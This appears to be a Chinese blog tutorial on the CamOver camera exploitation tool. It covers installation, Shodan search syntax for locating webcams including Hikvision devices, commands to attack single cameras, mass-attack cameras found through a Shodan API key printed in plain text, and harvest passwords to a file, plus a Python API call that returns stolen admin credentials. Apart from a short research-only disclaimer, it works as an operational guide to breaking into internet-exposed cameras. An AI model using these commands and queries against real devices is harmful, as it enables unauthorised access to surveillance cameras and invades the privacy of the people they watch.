0%

CamOver安装与使用

描述


声明:文中所涉及的技术、思路和工具仅供以安全研究为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

CamOver 是一款功能强大的摄像头漏洞利用工具,在该工具的帮助下,广大研究人员可以轻松破解网络摄像头的管理员密码,并且能与shodan网络设备搜索引擎配合利用。


安装

Linux安装CamOver

由于 CamOver 使用 Python3 开发,因此首先需要在本地设备上安装并配置好 Python3 环境。

1
pip3 install git+https://github.com/EntySec/CamOver

image-20211029193739833

功能特性

  • 该工具能够发现并利用大多数主流型号网络摄像头中的安全漏洞,例如 CCTV、GoAhead 和 Netwave 等。
  • 经过优化,支持多线程同时攻击多个摄像头。
  • 简单的命令行接口和 API 用法。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@kali:~# camover
usage: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]

CamOver is a camera exploitation tool that allows to disclosure network camera admin password.

optional arguments:
-h, --help show this help message and exit
-t, --threads Use threads for fastest work.
-o OUTPUT, --output OUTPUT
Output result to file.
-i INPUT, --input INPUT
Input file of addresses.
-a ADDRESS, --address ADDRESS
Single address.
--shodan SHODAN Shodan API key for exploiting devices over Internet.
--zoomeye ZOOMEYE ZoomEye API key for exploiting devices over Internet.
-p PAGES, --pages PAGES
Number of pages you want to get from ZoomEye.

Shodan的基本使用

官网:shodan,Shodan一些常用的语法;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
hostname:搜索指定的主机或域名。例如,hostname:"google"

port:搜索指定的端口或服务。例如, port:"21"

country:搜索指定的国家。例如, country:"CN"

city:搜索指定的城市。例如,city:"Hefei"

org:搜索指定的组织或公司。例如,org:"google"

isp:搜索指定的ISP供应商。例如, isp:"China Telecom"

product:搜索指定的操作系统/软件/平台。例如, product:"Apache httpd"

version:搜索指定的软件版本。例如, version:"1.6.2"

geo:搜索指定的地理位置,参数为经纬度。例如, geo:"31.8639,117.2808"

before/after:搜索指定收录时间前后的数据,格式为 dd-mm-yy。例如, before:"11-09-19"

net:搜索指定的IP地址或子网。例如,net:"210.45.240.0/24"

Shodan搜索例子

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
1、查找位于合肥的Apache服务器
apache city:"Hefei"

2、查找位于国内的Nginx服务器
nginx country:"CN"

3、查找GWS(Gogle Web Server)服务器
server: gws hostname:"google"

4、查找指定网段华为设备
huawei net:"64.191.146.0/24"

5、查找网络摄像头
webcam

6、查找国内的海康威视网络摄像头
Server: Hikvision-Webs country:"CN"

7、查找SQ-WEBCAM摄像头
Server: SQ-WEBCAM

使用

1.攻击单个摄像头;

1
camover -a xxx.xxx.xxx.xxx:port

2.通过网络攻击远程摄像头;

1
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

image-20211029200703875

使用浏览器访问;

image-20211029200745747

3.从输入文件获取目标摄像头;

还可以使用开放数据库中提供的摄像头地址,使用 -t 参数来设置多线程数量以获得更好的性能:

1
camover -t -i cameras.txt -o passwords.txt

此命令将会攻击 cameras.txt 中给出的所有摄像头,并会将所有获取到的密码存储至 passwords.txt 文件中。

4.API的调用

CamOver 还提供了自己的 Python API,可以将其导入至你们自己的项目代码中并调用其功能:

1
from camover import CamOver

调用样例,攻击单个摄像头:

1
2
3
4
5
6
7
from camover import CamOver

camover = CamOver()
creds = camover.exploit('xxx.xxx.xxx.xxx:port')

print(creds)
# 输出: ('admin', 'gzmudzka')

欢迎关注我的其它发布渠道